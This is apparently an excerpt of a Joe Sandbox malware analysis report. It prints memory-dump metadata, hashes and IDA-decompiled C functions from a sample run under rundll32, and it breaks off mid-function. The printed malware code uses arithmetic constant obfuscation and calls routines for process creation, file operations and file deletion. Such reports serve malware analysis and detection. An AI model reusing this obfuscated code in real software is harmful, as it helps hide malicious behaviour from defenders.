aD[a, xrefs: 00B2F11B
6, xrefs: 00B2F0CE
I/5o, xrefs: 00B2F072
L, xrefs: 00B2EFB3

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: I/5o$aD[a$6$L
API String ID: 0-1330720659
Opcode ID: 3e54c94ddfc2db5ad955fe2ea8c68411d5a02c2290dbca09f218aeefbf2c9eca
Instruction ID: 3e79e3b68dab18a4b8e3b023ffa33dfa63c4d48d3629fbd5e7d2d2b534d2f7fa
Opcode Fuzzy Hash: 3e54c94ddfc2db5ad955fe2ea8c68411d5a02c2290dbca09f218aeefbf2c9eca
Instruction Fuzzy Hash: 539131711083419FD318CF65D48941BBBF6FBC4758F108A2EF19A96260D7B98A09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00B27B63, Relevance: 2.7, Strings: 2, Instructions: 187
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00B27B63(void* __ecx, void* __edx, void* __eflags) {
				void* _t227;
				signed int _t253;
				signed int _t257;
				signed int _t258;
				void* _t279;
				void* _t280;

				_t279 = _t280 - 0x70;
				_push( *((intOrPtr*)(_t279 + 0x7c)));
				_push( *((intOrPtr*)(_t279 + 0x78)));
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t227);
				 *(_t279 + 0x5c) = 0x4f49;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff573d;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) >> 0xe;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff1f14;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) ^ 0x00031f13;
				 *(_t279 + 0x20) = 0x2d3b;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) << 0xa;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) ^ 0x00b4ea14;
				 *(_t279 + 0x38) = 0xada;
				_t257 = 0x56;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) * 0xd;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x7978ee92;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x79786b80;
				 *(_t279 + 0x44) = 0x9fd0;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) << 0xd;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) + 0xffff90c4;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) ^ 0x13f99f58;
				 *(_t279 + 0x28) = 0xbdd8;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) / _t257;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65272766;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65270fe8;
				 *(_t279 + 0x24) = 0xa469;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) * 0x47;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) ^ 0x002db229;
				 *(_t279 + 0x48) = 0xdd17;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) << 4;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) >> 9;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) ^ 0x00005398;
				 *(_t279 + 0x3c) = 0x840;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x7135c857;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) + 0xffffaa29;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x71355336;
				 *(_t279 + 0x34) = 0xe245;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x5c1086b0;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) << 0xc;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x064f42a5;
				 *(_t279 + 0x68) = 0x7c59;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 7;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) + 0xdfb1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) ^ 0x00006add;
				 *(_t279 + 0x1c) = 0x17b0;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) * 0x33;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) ^ 0x0004ea7a;
				 *(_t279 + 0xc) = 0x52de;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) >> 3;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) ^ 0x00000565;
				 *(_t279 + 0x14) = 0xa04a;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) + 0x5b3d;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) ^ 0x0000ad98;
				 *(_t279 + 0x10) = 0x88b9;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) << 0xa;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) ^ 0x0222fd12;
				 *(_t279 + 0x58) = 0x8451;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) << 1;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff44cb;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff231f;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) ^ 0xffff3ae7;
				 *(_t279 + 0x2c) = 0xa221;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) << 0xe;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x37ec24ae;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x1f641a26;
				 *(_t279 + 0x6c) = 0xb834;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) * 5;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xff22;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xffff2c65;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) ^ 0x00038cf7;
				 *(_t279 + 0x60) = 0x6d71;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) + 0xffff2e20;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) << 0xa;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) >> 7;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) ^ 0x01fcf6fe;
				 *(_t279 + 0x40) = 0xcc9d;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) << 1;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) | 0xa720d145;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) ^ 0xa721d74b;
				 *(_t279 + 0x50) = 0xea3;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) + 0x27fa;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) >> 7;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) ^ 0x00000071;
				 *(_t279 + 0x64) = 0xe156;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) + 0x8b10;
				_t258 = 0x77;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) / _t258;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) << 7;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) ^ 0x0001fc91;
				 *(_t279 + 0x54) = 0xb949;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0xe8c9a038;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x53;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x46;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0x24032f8e;
				 *(_t279 + 0x4c) = 0x8c7e;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) * 0x17;
				_t171 = _t279 - 0x14; // 0x68cf93e9
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) << 5;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) ^ 0x0193ba3f;
				 *(_t279 + 0x30) = 0x8a4e;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) << 0xc;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) | 0xb22e72a5;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) ^ 0xbaaee90f;
				 *(_t279 + 0x18) = 0x537b;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) >> 0x10;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) ^ 0x00002127;
				E00B393A8( *(_t279 + 0x44),  *(_t279 + 0x28),  *(_t279 + 0x24), _t171, 0x1e,  *(_t279 + 0x48));
				_t193 = _t279 - 0x21c; // 0x68cf91e1
				E00B393A8( *(_t279 + 0x3c),  *(_t279 + 0x34),  *(_t279 + 0x68), _t193, 0x208,  *(_t279 + 0x1c));
				_t198 = _t279 - 0x424; // 0x68cf8fd9
				E00B393A8( *(_t279 + 0xc),  *(_t279 + 0x14),  *(_t279 + 0x10), _t198, 0x208,  *(_t279 + 0x58));
				_t202 = _t279 - 0x21c; // 0x68cf91e1
				E00B26636(_t202,  *(_t279 + 0x2c),  *(_t279 + 0x6c),  *(_t279 + 0x60),  *((intOrPtr*)(_t279 + 0x78)));
				_t208 = _t279 - 0x424; // 0x68cf8fd9
				E00B26636(_t208,  *(_t279 + 0x40),  *(_t279 + 0x50),  *(_t279 + 0x64),  *((intOrPtr*)(_t279 + 0x7c)));
				 *(_t279 - 0x10) =  *(_t279 + 0x5c);
				_t214 = _t279 - 0x14; // 0x68cf93e9
				_t215 = _t279 - 0x21c; // 0x68cf91e1
				 *((intOrPtr*)(_t279 - 0xc)) = _t215;
				_t217 = _t279 - 0x424; // 0x68cf8fd9
				 *((intOrPtr*)(_t279 - 8)) = _t217;
				 *((short*)(_t279 - 4)) =  *(_t279 + 0x38) |  *(_t279 + 0x20);
				_t253 = E00B37BF4(_t214,  *(_t279 + 0x54),  *(_t279 + 0x4c),  *(_t279 + 0x30),  *(_t279 + 0x18)); // executed
				asm("sbb eax, eax");
				return  ~_t253 + 1;
			}

0x00b27b64
0x00b27b6f
0x00b27b72
0x00b27b75
0x00b27b76
0x00b27b77
0x00b27b7c
0x00b27b85
0x00b27b8c
0x00b27b90
0x00b27b97
0x00b27b9e
0x00b27ba5
0x00b27ba9
0x00b27bb0
0x00b27bbd
0x00b27bbe
0x00b27bc1
0x00b27bc8
0x00b27bcf
0x00b27bd6
0x00b27bda
0x00b27be1
0x00b27be8
0x00b27bf4
0x00b27bf7
0x00b27bfe
0x00b27c05
0x00b27c10
0x00b27c13
0x00b27c1a
0x00b27c21
0x00b27c25
0x00b27c29
0x00b27c30
0x00b27c37
0x00b27c3e
0x00b27c45
0x00b27c4c
0x00b27c53
0x00b27c5a
0x00b27c5e
0x00b27c65
0x00b27c6c
0x00b27c70
0x00b27c77
0x00b27c7a
0x00b27c81
0x00b27c8c
0x00b27c8f
0x00b27c96
0x00b27c9d
0x00b27ca1
0x00b27ca8
0x00b27caf
0x00b27cb6
0x00b27cbd
0x00b27cc4
0x00b27cc8
0x00b27ccf
0x00b27cd6
0x00b27cd9
0x00b27ce0
0x00b27ce7
0x00b27cee
0x00b27cf5
0x00b27cf9
0x00b27d00
0x00b27d07
0x00b27d12
0x00b27d15
0x00b27d1c
0x00b27d23
0x00b27d2a
0x00b27d33
0x00b27d3a
0x00b27d3e
0x00b27d42
0x00b27d49
0x00b27d50
0x00b27d53
0x00b27d5a
0x00b27d61
0x00b27d68
0x00b27d6f
0x00b27d73
0x00b27d77
0x00b27d7e
0x00b27d8a
0x00b27d8d
0x00b27d90
0x00b27d94
0x00b27d9b
0x00b27da2
0x00b27dad
0x00b27db4
0x00b27db7
0x00b27dbe
0x00b27dc9
0x00b27dcc
0x00b27dcf
0x00b27dd3
0x00b27dda
0x00b27de1
0x00b27de5
0x00b27dec
0x00b27df3
0x00b27dfa
0x00b27dfe
0x00b27e14
0x00b27e21
0x00b27e32
0x00b27e3a
0x00b27e4b
0x00b27e53
0x00b27e65
0x00b27e6d
0x00b27e7c
0x00b27e84
0x00b27e87
0x00b27e8a
0x00b27e90
0x00b27e93
0x00b27e99
0x00b27ea5
0x00b27eb2
0x00b27ebc
0x00b27ec4

Strings

f''e, xrefs: 00B27BF7
6S5q, xrefs: 00B27C45

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: 6S5q$f''e
API String ID: 3080627654-2864536462
Opcode ID: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
Instruction ID: 6fa69ae70e3ca78099421341317d41dc895f553c8665997b3fb88eedc259c1ce
Opcode Fuzzy Hash: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
Instruction Fuzzy Hash: 65A1BDB140138D9BEF59CF61C9898CE3BB1BF04358F508119FD2A962A0D7BAD959CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00B2568E, Relevance: 1.4, Strings: 1, Instructions: 184
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E00B2568E(void* __ecx, void* __edx) {
				void* _t188;
				void* _t209;
				void* _t210;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				intOrPtr _t242;
				void* _t245;
				void* _t248;
				void* _t249;

				_t248 = _t249 - 0x5c;
				_t242 =  *((intOrPtr*)(_t248 + 0x6c));
				_t245 = __edx;
				_push(0);
				_push( *((intOrPtr*)(_t248 + 0x78)));
				_push( *((intOrPtr*)(_t248 + 0x74)));
				_push( *((intOrPtr*)(_t248 + 0x70)));
				_push(_t242);
				_push( *((intOrPtr*)(_t248 + 0x68)));
				_push( *((intOrPtr*)(_t248 + 0x64)));
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t188);
				 *(_t248 + 0x38) = 0xda0c;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) << 7;
				_t215 = 0x75;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) * 0x59;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) ^ 0x25e734ff;
				 *(_t248 + 0x54) = 0xb39d;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) << 6;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) | 0xca3cae0f;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) * 0xe;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) ^ 0x0f551016;
				 *(_t248 + 0x1c) = 0x5da7;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x52b401ed;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) / _t215;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x00b496a1;
				 *(_t248 + 0x30) = 0xba31;
				_t216 = 0x2c;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) / _t216;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) | 0x346b3718;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) ^ 0x346b13e9;
				 *(_t248 + 0x2c) = 0x6402;
				_t217 = 0x3f;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) * 0x14;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) >> 2;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) ^ 0x0001cbcb;
				 *(_t248 + 0x34) = 0x3e45;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) << 0xb;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) >> 2;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) ^ 0x007ce60c;
				 *(_t248 + 0x3c) = 0xfd38;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) + 0xffffe888;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) * 0x69;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) ^ 0x005e4f03;
				 *(_t248 + 0x40) = 0xcc4c;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x07f5c2dc;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) / _t217;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x00207040;
				 *(_t248 + 0x28) = 0x6724;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) + 0xffffafc3;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) << 1;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) ^ 0x000008e0;
				 *(_t248 + 0x24) = 0x9d87;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) >> 6;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) * 0x24;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) ^ 0x00004341;
				 *(_t248 + 0x58) = 0xb89d;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) >> 0xb;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) + 0x8f1;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) << 8;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) ^ 0x00091f00;
				 *(_t248 + 0x44) = 0x534f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) + 0x522f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c12b7e9;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c125009;
				 *(_t248 + 0x20) = 0x7c36;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x32feb437;
				_t218 = 0x73;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) / _t218;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x0071b2de;
				 *(_t248 + 0x4c) = 0x6d80;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xd21e;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xffff4640;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x36936ae7;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x3693cc91;
				 *(_t248 + 0x50) = 0x11c0;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x65d8412a;
				_t219 = 0x49;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) / _t219;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x06211354;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) ^ 0x076544c6;
				 *(_t248 + 0x18) = 0x8ddc;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) | 0x3e354716;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) ^ 0x3e35d915;
				 *(_t248 + 0x14) = 0xfbdb;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) * 0x44;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) ^ 0x0042d7a4;
				 *(_t248 + 0x48) = 0xd404;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) >> 1;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0x728c;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0xfe7d;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) ^ 0x0001b0de;
				_t220 =  *(_t248 + 0x38);
				E00B393A8( *(_t248 + 0x38),  *(_t248 + 0x54),  *(_t248 + 0x1c), _t248 - 0x40, 0x44,  *(_t248 + 0x30));
				 *((intOrPtr*)(_t248 - 0x40)) = 0x44;
				_t209 = E00B3976F( *(_t248 + 0x2c), _t248 + 4,  *(_t248 + 0x34),  *(_t248 + 0x3c),  *(_t248 + 0x40),  *(_t248 + 0x28), _t248 - 0x40, _t245,  *(_t248 + 0x24),  *(_t248 + 0x38), _t220,  *(_t248 + 0x58),  *(_t248 + 0x44), _t220,  *(_t248 + 0x20),  *(_t248 + 0x4c),  *((intOrPtr*)(_t248 + 0x64)), _t220,  *((intOrPtr*)(_t248 + 0x74))); // executed
				if(_t209 == 0) {
					_t210 = 0;
				} else {
					if(_t242 == 0) {
						E00B34F7D( *(_t248 + 0x50),  *(_t248 + 0x18),  *((intOrPtr*)(_t248 + 4)));
						E00B34F7D( *(_t248 + 0x14),  *(_t248 + 0x48),  *((intOrPtr*)(_t248 + 8)));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t210 = 1;
				}
				return _t210;
			}

0x00b2568f
0x00b2569b
0x00b2569e
0x00b256a0
0x00b256a2
0x00b256a5
0x00b256a8
0x00b256ab
0x00b256ac
0x00b256af
0x00b256b2
0x00b256b3
0x00b256b4
0x00b256b9
0x00b256c2
0x00b256cc
0x00b256cf
0x00b256d2
0x00b256d9
0x00b256e0
0x00b256e4
0x00b256ef
0x00b256f2
0x00b256f9
0x00b25700
0x00b2570e
0x00b25711
0x00b25718
0x00b25722
0x00b25727
0x00b2572c
0x00b25733
0x00b2573a
0x00b25745
0x00b25746
0x00b25749
0x00b2574d
0x00b25754
0x00b2575b
0x00b2575f
0x00b25763
0x00b2576a
0x00b25771
0x00b2577c
0x00b2577f
0x00b25786
0x00b2578d
0x00b25799
0x00b2579c
0x00b257a3
0x00b257aa
0x00b257b1
0x00b257b4
0x00b257bb
0x00b257c2
0x00b257ca
0x00b257cd
0x00b257d4
0x00b257db
0x00b257df
0x00b257e6
0x00b257ea
0x00b257f1
0x00b257f8
0x00b25801
0x00b25808
0x00b2580f
0x00b25816
0x00b25822
0x00b25827
0x00b2582c
0x00b25833
0x00b2583a
0x00b25841
0x00b25848
0x00b2584f
0x00b25856
0x00b2585d
0x00b25867
0x00b2586a
0x00b2586d
0x00b25874
0x00b2587b
0x00b25882
0x00b25889
0x00b25890
0x00b2589b
0x00b258a1
0x00b258a8
0x00b258af
0x00b258b2
0x00b258b9
0x00b258c0
0x00b258d3
0x00b258d6
0x00b258de
0x00b25915
0x00b2591f
0x00b25951
0x00b25921
0x00b25923
0x00b2593a
0x00b25948
0x00b25925
0x00b25928
0x00b25929
0x00b2592a
0x00b2592b
0x00b2592b
0x00b2592e
0x00b2592e
0x00b25959

Strings

@p , xrefs: 00B2579C

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: @p
API String ID: 963392458-2609516012
Opcode ID: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
Instruction ID: 38e9a371a404b679507698cd051bf616e8fa4c6b3afe98c76757aa3a743181e5
Opcode Fuzzy Hash: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
Instruction Fuzzy Hash: 41911372500248EFDF59CF61C98A9CE3BA1FF44348F509119FE1A961A0D3BAD999CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00B2C0C6, Relevance: 1.4, Strings: 1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00B2C0C6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v592;
				void* _t141;
				void* _t159;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t141);
				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v72 = 0x2e7eef;
				_v68 = 0x12a0e3;
				_v36 = 0x822d;
				_v36 = _v36 ^ 0x7542ca13;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00755fa2;
				_v48 = 0xc0ea;
				_t161 = 0x4d;
				_v48 = _v48 * 0x52;
				_v48 = _v48 + 0x53ba;
				_v48 = _v48 ^ 0x003e0539;
				_v8 = 0xf2be;
				_v8 = _v8 ^ 0xca92c6dd;
				_v8 = _v8 | 0xdeb53509;
				_v8 = _v8 + 0x330e;
				_v8 = _v8 ^ 0xdeb75724;
				_v28 = 0xbc60;
				_v28 = _v28 * 3;
				_v28 = _v28 ^ 0x088be546;
				_v28 = _v28 ^ 0x0889fb38;
				_v20 = 0x79be;
				_v20 = _v20 / _t161;
				_t162 = 0x2f;
				_v20 = _v20 * 0x21;
				_v20 = _v20 / _t162;
				_v20 = _v20 ^ 0x000058f8;
				_v12 = 0x6f12;
				_v12 = _v12 + 0x2ef8;
				_v12 = _v12 ^ 0xc4c69b2c;
				_t163 = 0x19;
				_v12 = _v12 / _t163;
				_v12 = _v12 ^ 0x07dec8f1;
				_v16 = 0x233d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0xb86ca57e;
				_v16 = _v16 ^ 0x25a63868;
				_v16 = _v16 ^ 0x9dca839c;
				_v44 = 0x9c92;
				_v44 = _v44 ^ 0x484225af;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x0ae4f7f7;
				_v56 = 0xf3a1;
				_v56 = _v56 + 0xffff3be5;
				_v56 = _v56 ^ 0x00000dea;
				_v24 = 0xe687;
				_v24 = _v24 ^ 0x2fa59812;
				_v24 = _v24 | 0x8a70baf8;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x7fbf04b5;
				_v40 = 0x7d0b;
				_v40 = _v40 + 0xffffa14c;
				_v40 = _v40 + 0x5747;
				_v40 = _v40 ^ 0x000069af;
				_v32 = 0xbccf;
				_v32 = _v32 << 0xb;
				_v32 = _v32 + 0xa312;
				_v32 = _v32 ^ 0x05e7304f;
				_v52 = 0xd186;
				_v52 = _v52 << 7;
				_t164 = 0xc;
				_v52 = _v52 / _t164;
				_v52 = _v52 ^ 0x0008a17f;
				_push(_v48);
				E00B37BAF(_v52,  &_v592, _v28, _a4, _v20, _v12, E00B3889D(0xb3c050, _v36, _v52));
				E00B32025(_v16, _t154, _v44, _v56);
				_t159 = E00B3AA3C(_v24, _v40, _v32, _v52,  &_v592); // executed
				return _t159;
			}

0x00b2c0d0
0x00b2c0d3
0x00b2c0d6
0x00b2c0d9
0x00b2c0da
0x00b2c0db
0x00b2c0e0
0x00b2c0e6
0x00b2c0ea
0x00b2c0f1
0x00b2c0f8
0x00b2c0ff
0x00b2c106
0x00b2c10a
0x00b2c111
0x00b2c11e
0x00b2c121
0x00b2c124
0x00b2c12b
0x00b2c132
0x00b2c139
0x00b2c140
0x00b2c147
0x00b2c14e
0x00b2c155
0x00b2c160
0x00b2c163
0x00b2c16a
0x00b2c171
0x00b2c17f
0x00b2c186
0x00b2c189
0x00b2c193
0x00b2c196
0x00b2c19d
0x00b2c1a4
0x00b2c1ab
0x00b2c1b5
0x00b2c1b8
0x00b2c1bb
0x00b2c1c2
0x00b2c1c9
0x00b2c1cd
0x00b2c1d4
0x00b2c1db
0x00b2c1e2
0x00b2c1e9
0x00b2c1f0
0x00b2c1f4
0x00b2c1fb
0x00b2c202
0x00b2c209
0x00b2c210
0x00b2c217
0x00b2c21e
0x00b2c225
0x00b2c229
0x00b2c230
0x00b2c237
0x00b2c23e
0x00b2c245
0x00b2c24c
0x00b2c253
0x00b2c257
0x00b2c25e
0x00b2c265
0x00b2c26e
0x00b2c277
0x00b2c27f
0x00b2c282
0x00b2c289
0x00b2c2ad
0x00b2c2bd
0x00b2c2d5
0x00b2c2e1

Strings

~., xrefs: 00B2C0EA

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: ~.
API String ID: 4033686569-2304494891
Opcode ID: 3660ce364529718a99cd80129d1a3336c51f2e5d3372a0baa0f33940c75dc590
Instruction ID: aff5a294c87b391e1390ee01fcbdd0b085c3c4af79fbc3b5837d32b7e1f89a2b
Opcode Fuzzy Hash: 3660ce364529718a99cd80129d1a3336c51f2e5d3372a0baa0f33940c75dc590
Instruction Fuzzy Hash: 9F5113B1C0121DEBDF48DFE5D94A8DEBBB2FB08304F208159E511B6260D7B91A58DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00B2B41F, Relevance: 1.3, Strings: 1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00B2B41F(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t91;
				signed int* _t93;
				intOrPtr _t95;
				signed int _t103;
				signed int _t104;

				_v44 = _v44 & 0x00000000;
				_v48 = 0x783c80;
				_v8 = 0x978d;
				_v8 = _v8 >> 8;
				_v8 = _v8 >> 5;
				_v8 = _v8 | 0x918d7e28;
